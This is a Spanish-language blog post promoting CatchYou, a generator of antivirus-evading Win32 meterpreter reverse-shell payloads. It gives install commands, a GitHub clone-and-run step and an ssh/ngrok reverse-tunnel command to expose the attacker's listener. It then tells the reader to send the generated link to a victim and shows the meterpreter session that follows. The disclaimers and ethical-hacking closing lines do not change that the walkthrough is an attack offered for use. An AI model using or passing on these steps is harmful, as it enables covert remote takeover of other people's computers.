Descarga tu guía de trucos informáticos aquí
CATCHYOU Generador Payload msfvenom
CATCHYOU Generador Payload msfvenom

CATCHYOU: Generador Payload msfvenom

catchyou es un generador de payload (carga útil) Win32 MSFVenom totalmente indetectable (FUD).

Advertencia!

EsGeeks no ofrece ninguna garantía con este programa y no será responsable de ningún daño directo o indirecto causado por el uso de esta herramienta. EsGeeks está construido para fines educativos. Úsalo bajo tu propio riesgo.

1.Características de catchyou

  • Fully Undetectable Win32 MSFVenom Payload Generator (meterpreter/shell reverse tcp)
  • Reenvío de puertos con ngrok
  • Probado: Win7 / Win10


Requisitos:

  • Metasploit / MSFVenom
  • mingw-w64:
apt-get install mingw-w64

Requisitos de reenvío:

./ngrok authtoken <TU_AUTHTOKEN>

El uso de CatchYou para atacar objetivos sin previo consentimiento mutuo es ilegal. Es responsabilidad del usuario final obedecer todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables del mal uso o daño causado por este programa.

2. Instalar y usar catchyou

View this post on Instagram

🔥 CATCHYOU Payload Windows 🦍 . 🅶🅴🅽🅴🆁🅰🅳🅾🆁 🅿🅰🆈🅻🅾🅰🅳 . Fully Undetectable Win32 MSFVenom Payload Generator (meterpreter/shell reverse tcp) . ♥ Si te gustó el vídeo dale ♥ Comenta con 🦍 si deseas más contenido similar . EXPLICACIÓN COMPLETA: https://esgeeks.com/?p=9754 . . 🎯 w w w . e s g e e k s . c o m . . 👉 Sigue a EsGeeks en Instagram: @EsGeeks 👉 Sigue a EsGeeks en Facebook: @EsGeeksOficial 👉 Sigue a EsGeeks en Twitter: @EsGeeks 👉 Sigue a EsGeeks en Telegram: https://t.me/EsGeeks 👉 Sigue a EsGeeks en Discord: https://discord.gg/EyY6SPW . . ⚠️ Recuerda respetar cualquier derecho de autoría. [Descargo de Responsabilidad] Ni el autor ni @Esgeeks es responsable por el uso que realices con esta herramienta. . . 📑 Copyright 2020: Picture by EsGeeks & Audio by Audioblocks . . #EsGeeks #hack #Hacking #Hacker #hackers #github #termuxhacking #hackingnews #ethicalhacking #hackingtools #pentesting #parrotos #kalilinux #cracking #hacked #anonymous #linux #cybercrime #payload #mterpreter #metasploit #fud #MSFVenom

A post shared by ESGEEKS (@esgeeks) on

Su instalación y uso es tan simple como clonar desde el repositorio en Github y ejecutar el archivo bash catchyou.sh:

git clone https://github.com/thelinuxchoice/catchyou
cd catchyou
bash catchyou.sh
Instalar catchyou en Linux
Instalar catchyou en Linux

Ahora, la siguiente imagen muestra la interfaz principal donde podemos elegir la opción de reenvío de puertos. En este ejemplo usaré (1) ngrok.

Opciones Hacking con catchyou
Opciones Hacking con catchyou

A continuación, relleno los otros campos solicitados como son: nombre de payload (esgeeks) y redireccionamiento de página (https://esgeeks.com). Lo que he colocado entre paréntesis lo puedes modificar a tu gusto. Sigamos…

FUD payload generator
FUD payload generator

En pantalla aparecerá un nuevo comando que debemos en una nueva ventana de terminal para obtener una URL personalizada de nuestro ataque. Yo he colocado lo siguiente.

ssh -R 80:localhost:3333 esgeeks@ssh.localhost.run


Generar subdominio local con ngrok
Generar subdominio local con ngrok

Y como puedes ver en la siguiente imagen, se ha generado una URL con un subdominio personalizado “a medias” y que será enviado a la víctima para que lo abra

Win32 MSFVenom Payload en Windows
Win32 MSFVenom Payload en Windows

Cuando la víctima abre el enlace, podemos ver en pantalla algo como lo siguiente: Tenemos una sesión meterpreter abierta.

Sesión Meterpreter Open en Windows 10
Sesión Meterpreter Open en Windows 10

Desde allí, podemos hacer muchas cosas con distintos comandos. Puedes echar un vistazo a distintos comandos en esta hoja de trucos.

Hacking con MSFVenom en Windows 10
Hacking con MSFVenom en Windows 10

3. Conclusión

Si estás interesado en hackear puedes aprenderlo y trabajar como hacker ético. Un hacker ético ‘hackea’ otros PC, laptops o teléfono Android por una buena razón. Las grandes empresas y organizaciones designan hackers por su seguridad. Sigue el camino del hacking ético y no intentes entrar en la vida privada de nadie, ya que podrías terminar siendo procesado o encarcelado.

Contenido relacionado:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  Facebook, TELEGRAM, Discord, TwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Más artículos
búsqueda imágenes fotos pc
3 Tips para Buscar Imágenes en tu PC